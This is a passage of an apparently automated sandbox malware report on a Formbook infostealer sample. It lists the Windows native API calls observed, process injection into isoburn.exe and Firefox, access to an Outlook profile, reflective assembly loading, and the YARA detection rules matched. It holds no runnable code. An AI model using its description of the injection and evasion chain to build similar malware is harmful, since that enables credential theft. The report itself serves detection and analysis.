            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2FB0 NtResumeThread,2_2_015B2FB0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2FA0 NtQuerySection,2_2_015B2FA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2E30 NtWriteVirtualMemory,2_2_015B2E30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2EE0 NtQueueApcThread,2_2_015B2EE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2E80 NtReadVirtualMemory,2_2_015B2E80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2EA0 NtAdjustPrivilegesToken,2_2_015B2EA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3010 NtOpenDirectoryObject,2_2_015B3010
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3090 NtSetValueKey,2_2_015B3090
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B39B0 NtGetContextThread,2_2_015B39B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3D70 NtOpenThread,2_2_015B3D70
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B3D10 NtOpenProcessToken,2_2_015B3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D4650 NtSuspendThread,LdrInitializeThunk,4_2_049D4650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D4340 NtSetContextThread,LdrInitializeThunk,4_2_049D4340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_049D2CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_049D2C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2C60 NtCreateKey,LdrInitializeThunk,4_2_049D2C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_049D2DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_049D2DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_049D2D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_049D2D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_049D2E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_049D2EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2FB0 NtResumeThread,LdrInitializeThunk,4_2_049D2FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2FE0 NtCreateFile,LdrInitializeThunk,4_2_049D2FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2F30 NtCreateSection,LdrInitializeThunk,4_2_049D2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2AD0 NtReadFile,LdrInitializeThunk,4_2_049D2AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2AF0 NtWriteFile,LdrInitializeThunk,4_2_049D2AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_049D2BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_049D2BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_049D2BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2B60 NtClose,LdrInitializeThunk,4_2_049D2B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D35C0 NtCreateMutant,LdrInitializeThunk,4_2_049D35C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D39B0 NtGetContextThread,LdrInitializeThunk,4_2_049D39B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2CC0 NtQueryVirtualMemory,4_2_049D2CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2CF0 NtOpenProcess,4_2_049D2CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2C00 NtQueryInformationProcess,4_2_049D2C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2DB0 NtEnumerateKey,4_2_049D2DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2D00 NtSetInformationFile,4_2_049D2D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2EA0 NtAdjustPrivilegesToken,4_2_049D2EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2E30 NtWriteVirtualMemory,4_2_049D2E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2F90 NtProtectVirtualMemory,4_2_049D2F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2FA0 NtQuerySection,4_2_049D2FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2F60 NtCreateProcessEx,4_2_049D2F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2AB0 NtWaitForSingleObject,4_2_049D2AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D2B80 NtQueryInformationFile,4_2_049D2B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3090 NtSetValueKey,4_2_049D3090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3010 NtOpenDirectoryObject,4_2_049D3010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3D10 NtOpenProcessToken,4_2_049D3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D3D70 NtOpenThread,4_2_049D3D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F4F10 NtCreateFile,4_2_028F4F10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F52C0 NtAllocateVirtualMemory,4_2_028F52C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F5040 NtReadFile,4_2_028F5040
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F5180 NtClose,4_2_028F5180
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F5100 NtDeleteFile,4_2_028F5100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049AAD004_2_049AAD00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3CD1F4_2_04A3CD1F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049B2E904_2_049B2E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5CE934_2_04A5CE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5EEDB4_2_04A5EEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5EE264_2_04A5EE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A0E594_2_049A0E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A1EFA04_2_04A1EFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04992FC84_2_04992FC8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A42F304_2_04A42F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049C0F304_2_049C0F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E2F284_2_049E2F28
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A14F404_2_04A14F40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049868B84_2_049868B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049CE8F04_2_049CE8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A28404_2_049A2840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049AA8404_2_049AA840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A6A9A64_2_04A6A9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A29A04_2_049A29A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049B69624_2_049B6962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0499EA804_2_0499EA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A56BD74_2_04A56BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5AB404_2_04A5AB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5F43F4_2_04A5F43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049914604_2_04991460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3D5B04_2_04A3D5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A695C34_2_04A695C3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A575714_2_04A57571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A516CC4_2_04A516CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E56304_2_049E5630
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5F7B04_2_04A5F7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5F0E04_2_04A5F0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A570E94_2_04A570E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A70C04_2_049A70C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A4F0CC4_2_04A4F0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A6B16B4_2_04A6B16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0498F1724_2_0498F172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049D516C4_2_049D516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A52A04_2_049A52A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A412ED4_2_04A412ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BB2C04_2_049BB2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BD2F04_2_049BD2F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E739A4_2_049E739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5132D4_2_04A5132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_0498D34C4_2_0498D34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FCF24_2_04A5FCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A19C324_2_04A19C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BFDC04_2_049BFDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A57D734_2_04A57D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A3D404_2_049A3D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A51D5A4_2_04A51D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A9EB04_2_049A9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A1F924_2_049A1F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FFB14_2_04A5FFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04963FD54_2_04963FD5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04963FD24_2_04963FD2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FF094_2_04A5FF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A38E04_2_049A38E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A0D8004_2_04A0D800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A359104_2_04A35910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049A99504_2_049A9950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BB9504_2_049BB950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A41AA34_2_04A41AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A3DAAC4_2_04A3DAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049E5AA04_2_049E5AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A4DAC64_2_04A4DAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A13A6C4_2_04A13A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A57A464_2_04A57A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FA494_2_04A5FA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049BFB804_2_049BFB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A15BF04_2_04A15BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_049DDBF94_2_049DDBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_04A5FB764_2_04A5FB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028E1A104_2_028E1A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DAEE04_2_028DAEE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DCE604_2_028DCE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DCC374_2_028DCC37
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028DCC404_2_028DCC40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028E316B4_2_028E316B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028E31704_2_028E3170
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4_2_028F75104_2_028F7510
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015EEA12 appears 86 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015B5130 appears 58 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 0156B970 appears 257 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015C7E54 appears 99 times
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: String function: 015FF290 appears 103 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 049E7E54 appears 107 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04A1F290 appears 103 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0498B970 appears 262 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 049D5130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04A0EA12 appears 86 times
            Source: WrrCV4QR2J.exe, 00000000.00000002.1688006226.0000000007F10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000000.00000002.1683349933.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000000.00000000.1664181209.0000000000A62000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTUvN.exeT vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameISOBURN.EXEj% vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe, 00000002.00000002.1792171632.000000000166D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe Binary or memory string: OriginalFilenameTUvN.exeT vs WrrCV4QR2J.exe
            Source: WrrCV4QR2J.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: WrrCV4QR2J.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.cs Security API names: _0020.SetAccessControl
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.cs Security API names: _0020.AddAccessRule
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, uZsT5V3p7CYwSeRgrW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.cs Security API names: _0020.SetAccessControl
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.WrrCV4QR2J.exe.7f10000.8.raw.unpack, UZYrI4Yk8mLQXKp43V.cs Security API names: _0020.AddAccessRule
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, uZsT5V3p7CYwSeRgrW.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/15
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WrrCV4QR2J.exe.log
            Source: C:\Windows\SysWOW64\isoburn.exe File created: C:\Users\user\AppData\Local\Temp\7e327r58
            Source: WrrCV4QR2J.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: WrrCV4QR2J.exe ReversingLabs: Detection: 73%
            Source: unknown Process created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exe
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Process created: C:\Users\user\Desktop\WrrCV4QR2J.exe C:\Users\user\Desktop\WrrCV4QR2J.exe
            Source: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe Process created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\isoburn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: WrrCV4QR2J.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: WrrCV4QR2J.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdb source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: WrrCV4QR2J.exe, 00000002.00000002.1791940779.0000000001017000.00000004.00000020.00020000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000003.00000002.4120809437.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UHPrrMeffyCaz.exe, 00000003.00000002.4120453242.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp, UHPrrMeffyCaz.exe, 00000006.00000000.1845745734.00000000000AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: WrrCV4QR2J.exe, WrrCV4QR2J.exe, 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000004.00000003.1791775384.00000000045F1000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1793504608.00000000047AB000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004960000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4121792966.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: isoburn.exe, 00000004.00000003.2011823112.0000000007C8E000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000004.00000003.1960362035.00000000075F5000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: WrrCV4QR2J.exe, Token_Toolbar.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.WrrCV4QR2J.exe.3fbebe0.5.raw.unpack, UZYrI4Yk8mLQXKp43V.cs .Net Code: jyoK6eXlCS System.Reflection.Assembly.Load(byte[])
